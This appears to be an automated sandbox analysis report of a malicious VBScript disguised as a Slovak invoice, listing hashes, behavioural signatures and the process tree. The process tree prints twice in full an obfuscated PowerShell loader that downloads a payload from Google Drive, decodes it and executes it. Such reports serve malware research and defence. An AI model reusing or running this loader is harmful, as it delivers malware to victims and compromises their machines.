Analysis
-
max time kernel
148s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240221-en -
resource tags
arch:x64arch:x86image:win10v2004-20240221-enlocale:en-usos:windows10-2004-x64system -
submitted
21/02/2024, 13:11
Static task
static1
Behavioral task
behavioral1
Sample
Faktúra PMC 180222SK24 & #160222SK71.vbs
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
Faktúra PMC 180222SK24 & #160222SK71.vbs
Resource
win10v2004-20240221-en
General
-
Target
Faktúra PMC 180222SK24 & #160222SK71.vbs
-
Size
9KB
-
MD5
c274599f81b62b991e411bfc33a61452
-
SHA1
fc82a711944cf2d8928ebefca07686901c39b9b2
-
SHA256
f26dc7069c57ff58f49105f7b6df0e9e467bde973a9eac5f5abc75511f83a825
-
SHA512
c5627bd8f9230099d2b5255c43e5e80e81d1dcce65e64f61f4250ec27a5db17eb341f3ba8221aa268c6f9cbc9c2b49d6d06d1762967a0e77dbc95e519520f961
-
SSDEEP
192:JtgQv8hyRUSN1dXbZj2nst2DhkVWfk3y6aRYlKoQgMWXcMJN:vnv8Mh1dXIsuk0Gy6aR7XWXcW
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-910440534-423636034-2318342392-1000\Control Panel\International\Geo\Nation WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 10 drive.google.com 11 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1304 4508 WerFault.exe 87 -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 448 powershell.exe 448 powershell.exe 4508 powershell.exe 4508 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 448 powershell.exe Token: SeDebugPrivilege 4508 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 3668 wrote to memory of 448 3668 WScript.exe 83 PID 3668 wrote to memory of 448 3668 WScript.exe 83 PID 448 wrote to memory of 4508 448 powershell.exe 87 PID 448 wrote to memory of 4508 448 powershell.exe 87 PID 448 wrote to memory of 4508 448 powershell.exe 87
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Faktúra PMC 180222SK24 & #160222SK71.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3668 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Lysaare='Recipr:\Futiliz';Set-Content $Lysaare 'Krick';$Tommels=Test-Path $Lysaare;if($Tommels){exit};function Accommodab9 ($Vrisse){For($Opslutni=4; $Opslutni -lt $Vrisse.Length-1; $Opslutni+=5){$Pister=$Pister+$Vrisse.'Substring'($Opslutni, 1)};$Pister;}$Unvent=Accommodab9 'antehVanetLaketpigepSigbsSeri:Adon/Sags/protd fyrrHetei frivFutue Fje.Biphg halo BefoPrecg danl aaseOrth.Corpc OveoUnsumunte/KolbubillcMime? CapeForkxEftep Uddo UncrSupetDeco=PeppdEtymoAuxiw MisnImbelStamoGypsaBesldTing& Uniiformd Sub= Unc1 Non2PalatBandYFyldKNedrPInfr6EgilLSatuO Rad2BestpNejsXMemb5 OtiRStamXAttedIncrS ConvItal3CathuStyrcefteF Mag9ChamnKaraZTrisVTrvloBelim JakDUdva5 ModOLaurd pom7Sama ';$Pister01=Accommodab9 'Latei SeieOmegxPris ';$Appletstue = Accommodab9 ' Afs\SabesPriny RonsOpdawBetio DekwOmgj6Dipl4Joro\ IndWIrreiGastnCompdAutooLaasw VissEvanP SpeoBeblw Pede FolrTheiS ProhunrieVisil Timl Lng\Aposv Boo1 Pen.Sepa0Musi\Chasp CrioEnanwBrneeSiturEklisAuthhMandeDrenl Uprl For. KaleFormxkonsealmu ';&($Pister01) (Accommodab9 'Hear$heriRAllueArbecinteiGrewpNougr Acc2Unde=Seri$ZooseTrannArbevArch:ScenwHippi KarnOverdNibei UdlrMarb ') ;&($Pister01) (Accommodab9 'Recu$GensATaglp Ovep HaalDesteSmaatFagosSalvtEarhu StieKokk= Uns$PuerRTemieStaac BayiUdfopDirerDisk2 Skr+Tour$HaabALovmpArkipethilyarbeSupet FifsTilltPantuTypeeChol ') ;&($Pister01) (Accommodab9 'Jger$BuntaUnfrr GrntunluiMegalUdbalFors Conc=Brnd Cras(Haar(Sumpg Impw KatmTouriFres Ejerw GruiIdennolym3Leuc2Hagg_PlappBeskrSlamo KvacKookeeluts MagsDebu Ant-ErigFUdlb OpsoP Chir SquoDucecTyveeDisssAlfosTotaIExamdThur= Pro$Glaz{baigPLudeIForeDFort}Rava)Mrke.esprCTryko VenmTropm BomaStrin TotdShalL Occi casnKvajeRipp)cycl Chon-KanasSkafpSkaml SkoiInextSkra Trou[DishcOarihScria Loarnedr]Sprj3kata4bris ');&($Pister01) (Accommodab9 'Over$GenoSBegapSamgoCapcrUnarv ShieJacojSpagsKont Sna=Unco Kult$RetiaSelvrVitit NoaiOverlEcstlStaf[Flam$ expaTredrHebrtChani UdklBombl Bes.Gitoc SteointeuImminRudetTran-Bluf2Dobb]Unpu ');&($Pister01) (Accommodab9 ' Lng$ArbeMOmbraTrykr Revg Evaische=Forh(BrynTUnsueEndosAnelt Mud-TeutPSiphaKladtPreihasyl Leth$DemoAPistpKassp Sepl ForeGermtTretsMicrt AduudomeeOgen)Bath Diop-TillAOvernBaptdFags Gene(Coen[ForsIInexnWhattjyttP NontAkkorindf] Sko:kseb:CorrsOptaiRkerzBuddeLati Nays-RadieKejsqEnke Stau8Isog)gard ') ;if ($Margi) {&$Appletstue $Sporvejs;} else {;$Pister00=Accommodab9 'NonsSudstt PoeaTrumrDesctBesp-CocrBSpumi MestIteasStokTFundrAppoaVitrnKontsRaynfAnureInvorDepe Drej-KiltS Aero ReduKeybrSjlecPredeRemi Reda$StepU Iron UmuvLysieHetenUldetStor Tra- GraDPleneChorsNatbtTraviSlannIntuaMorptisomi NesoSekunSejl Nova$ OrtRManneUnascCilai Pitp blarModa2Diph ';&($Pister01) (Accommodab9 'Achi$FredRVordeSymmcAlmiiLevepinderUrta2Dive=Leje$LedseMercnLedivStor:Bulba SempHrbapFritdpaupaKimotAmpha una ') ;&($Pister01) (Accommodab9 'UnneISydsmOkkepKvlloForbrUnhut Bea-KamiMYounoTracdFlesugtehlRealeNonr SeniBGnaviLovet buzsNettTSivnrAbsoaJndmnVikasFormfUndeeEpidrLder ') ;$Recipr2=$Recipr2+'\Reagicrhe.Rut';while (-not $Laasemeka) {&($Pister01) (Accommodab9 ' Din$ EksLudviaAnekaFreds ChaeImpam AnteVejgkleasaTint= Sno(SpriT Stre JossArbetDith-ressPAfreaAttrtcisthWell Bast$SlhuRharmeantacKnipiTruspFrigrSomn2Wess) Unf ') ;&($Pister01) $Pister00;&($Pister01) (Accommodab9 'UnstSChint DilaDentr EnctPhil-TidsSLrealUngle GlueNavepOrdb Bese5Glit ');}&($Pister01) (Accommodab9 'alky$EmboAMinicForscAfhjo ThemKronmStenoPanndFortascrabAcro For=Fors GalaGBrioeBarntnonv-SubcCImpuo DisnVejstSangeSparnKonttSoot Glas$EyebR PleePermcAdrei AnnpGnavrPedo2Bran ');&($Pister01) (Accommodab9 'Cate$UnfeSBladvEggpaTripmLagepParteMangk DagoInds Cumu=Squi Ungi[ borSStvryMuntsMiratHilseUnpam Gly.SammCOrieo BevnChamvUngde BevrNonstVold]Eliq:Seks:CharFOverrBidsoPalimLeafBFlleaSweesTreneSill6rsti4SletSNyret Forr hypi LegnSeorgFlin(Hast$FremABlodcPsyccSprooCachmPambm KlroAfled UncaVenebPlis)Slge ');&($Pister01) (Accommodab9 'Ceto$CellP TraiMexisXerotOffeeNontrMagn2Club Nyin=Disa Sand[ImusS UntyStres PoltStikeTuftmRica.StyrTvkkeeDespxUdsmt Taa.AlfaEUdskn JakcIneaoteeldgrioilordnHandgLeis]Unnu:fors: BriA IntSUnexCFingIDydsIOmga. AsyGIndheKorttSdebSSlastOverrCeltiemulnBoilgNonc(Cath$LizaSOvervOrgaaTrykmfrikpDepoeGrankTongolill)cont ');&($Pister01) (Accommodab9 ' Par$BortwSprohFodsiGenigslav= The$RokePCompiDevesTekstEroteKassrWild2 Til.BversGeneuLegebOversvolutSkilrAnegi CrynNitrg Whe(Pseu3Juan1Reds9 Bur6 Udb6acan1Last, Kde2 Ost7gran6 Lib5Marq7Renl)Skam ');&($Pister01) $whig;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:448 -
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Lysaare='Recipr:\Futiliz';Set-Content $Lysaare 'Krick';$Tommels=Test-Path $Lysaare;if($Tommels){exit};function Accommodab9 ($Vrisse){For($Opslutni=4; $Opslutni -lt $Vrisse.Length-1; $Opslutni+=5){$Pister=$Pister+$Vrisse.'Substring'($Opslutni, 1)};$Pister;}$Unvent=Accommodab9 'antehVanetLaketpigepSigbsSeri:Adon/Sags/protd fyrrHetei frivFutue Fje.Biphg halo BefoPrecg danl aaseOrth.Corpc OveoUnsumunte/KolbubillcMime? CapeForkxEftep Uddo UncrSupetDeco=PeppdEtymoAuxiw MisnImbelStamoGypsaBesldTing& Uniiformd Sub= Unc1 Non2PalatBandYFyldKNedrPInfr6EgilLSatuO Rad2BestpNejsXMemb5 OtiRStamXAttedIncrS ConvItal3CathuStyrcefteF Mag9ChamnKaraZTrisVTrvloBelim JakDUdva5 ModOLaurd pom7Sama ';$Pister01=Accommodab9 'Latei SeieOmegxPris ';$Appletstue = Accommodab9 ' Afs\SabesPriny RonsOpdawBetio DekwOmgj6Dipl4Joro\ IndWIrreiGastnCompdAutooLaasw VissEvanP SpeoBeblw Pede FolrTheiS ProhunrieVisil Timl Lng\Aposv Boo1 Pen.Sepa0Musi\Chasp CrioEnanwBrneeSiturEklisAuthhMandeDrenl Uprl For. KaleFormxkonsealmu ';&($Pister01) (Accommodab9 'Hear$heriRAllueArbecinteiGrewpNougr Acc2Unde=Seri$ZooseTrannArbevArch:ScenwHippi KarnOverdNibei UdlrMarb ') ;&($Pister01) (Accommodab9 'Recu$GensATaglp Ovep HaalDesteSmaatFagosSalvtEarhu StieKokk= Uns$PuerRTemieStaac BayiUdfopDirerDisk2 Skr+Tour$HaabALovmpArkipethilyarbeSupet FifsTilltPantuTypeeChol ') ;&($Pister01) (Accommodab9 'Jger$BuntaUnfrr GrntunluiMegalUdbalFors Conc=Brnd Cras(Haar(Sumpg Impw KatmTouriFres Ejerw GruiIdennolym3Leuc2Hagg_PlappBeskrSlamo KvacKookeeluts MagsDebu Ant-ErigFUdlb OpsoP Chir SquoDucecTyveeDisssAlfosTotaIExamdThur= Pro$Glaz{baigPLudeIForeDFort}Rava)Mrke.esprCTryko VenmTropm BomaStrin TotdShalL Occi casnKvajeRipp)cycl Chon-KanasSkafpSkaml SkoiInextSkra Trou[DishcOarihScria Loarnedr]Sprj3kata4bris ');&($Pister01) (Accommodab9 'Over$GenoSBegapSamgoCapcrUnarv ShieJacojSpagsKont Sna=Unco Kult$RetiaSelvrVitit NoaiOverlEcstlStaf[Flam$ expaTredrHebrtChani UdklBombl Bes.Gitoc SteointeuImminRudetTran-Bluf2Dobb]Unpu ');&($Pister01) (Accommodab9 ' Lng$ArbeMOmbraTrykr Revg Evaische=Forh(BrynTUnsueEndosAnelt Mud-TeutPSiphaKladtPreihasyl Leth$DemoAPistpKassp Sepl ForeGermtTretsMicrt AduudomeeOgen)Bath Diop-TillAOvernBaptdFags Gene(Coen[ForsIInexnWhattjyttP NontAkkorindf] Sko:kseb:CorrsOptaiRkerzBuddeLati Nays-RadieKejsqEnke Stau8Isog)gard ') ;if ($Margi) {&$Appletstue $Sporvejs;} else {;$Pister00=Accommodab9 'NonsSudstt PoeaTrumrDesctBesp-CocrBSpumi MestIteasStokTFundrAppoaVitrnKontsRaynfAnureInvorDepe Drej-KiltS Aero ReduKeybrSjlecPredeRemi Reda$StepU Iron UmuvLysieHetenUldetStor Tra- GraDPleneChorsNatbtTraviSlannIntuaMorptisomi NesoSekunSejl Nova$ OrtRManneUnascCilai Pitp blarModa2Diph ';&($Pister01) (Accommodab9 'Achi$FredRVordeSymmcAlmiiLevepinderUrta2Dive=Leje$LedseMercnLedivStor:Bulba SempHrbapFritdpaupaKimotAmpha una ') ;&($Pister01) (Accommodab9 'UnneISydsmOkkepKvlloForbrUnhut Bea-KamiMYounoTracdFlesugtehlRealeNonr SeniBGnaviLovet buzsNettTSivnrAbsoaJndmnVikasFormfUndeeEpidrLder ') ;$Recipr2=$Recipr2+'\Reagicrhe.Rut';while (-not $Laasemeka) {&($Pister01) (Accommodab9 ' Din$ EksLudviaAnekaFreds ChaeImpam AnteVejgkleasaTint= Sno(SpriT Stre JossArbetDith-ressPAfreaAttrtcisthWell Bast$SlhuRharmeantacKnipiTruspFrigrSomn2Wess) Unf ') ;&($Pister01) $Pister00;&($Pister01) (Accommodab9 'UnstSChint DilaDentr EnctPhil-TidsSLrealUngle GlueNavepOrdb Bese5Glit ');}&($Pister01) (Accommodab9 'alky$EmboAMinicForscAfhjo ThemKronmStenoPanndFortascrabAcro For=Fors GalaGBrioeBarntnonv-SubcCImpuo DisnVejstSangeSparnKonttSoot Glas$EyebR PleePermcAdrei AnnpGnavrPedo2Bran ');&($Pister01) (Accommodab9 'Cate$UnfeSBladvEggpaTripmLagepParteMangk DagoInds Cumu=Squi Ungi[ borSStvryMuntsMiratHilseUnpam Gly.SammCOrieo BevnChamvUngde BevrNonstVold]Eliq:Seks:CharFOverrBidsoPalimLeafBFlleaSweesTreneSill6rsti4SletSNyret Forr hypi LegnSeorgFlin(Hast$FremABlodcPsyccSprooCachmPambm KlroAfled UncaVenebPlis)Slge ');&($Pister01) (Accommodab9 'Ceto$CellP TraiMexisXerotOffeeNontrMagn2Club Nyin=Disa Sand[ImusS UntyStres PoltStikeTuftmRica.StyrTvkkeeDespxUdsmt Taa.AlfaEUdskn JakcIneaoteeldgrioilordnHandgLeis]Unnu:fors: BriA IntSUnexCFingIDydsIOmga. AsyGIndheKorttSdebSSlastOverrCeltiemulnBoilgNonc(Cath$LizaSOvervOrgaaTrykmfrikpDepoeGrankTongolill)cont ');&($Pister01) (Accommodab9 ' Par$BortwSprohFodsiGenigslav= The$RokePCompiDevesTekstEroteKassrWild2 Til.BversGeneuLegebOversvolutSkilrAnegi CrynNitrg Whe(Pseu3Juan1Reds9 Bur6 Udb6acan1Last, Kde2 Ost7gran6 Lib5Marq7Renl)Skam ');&($Pister01) $whig;}"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4508 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 21764⤵
- Program crash
PID:1304
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4508 -ip 45081⤵PID:2460
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82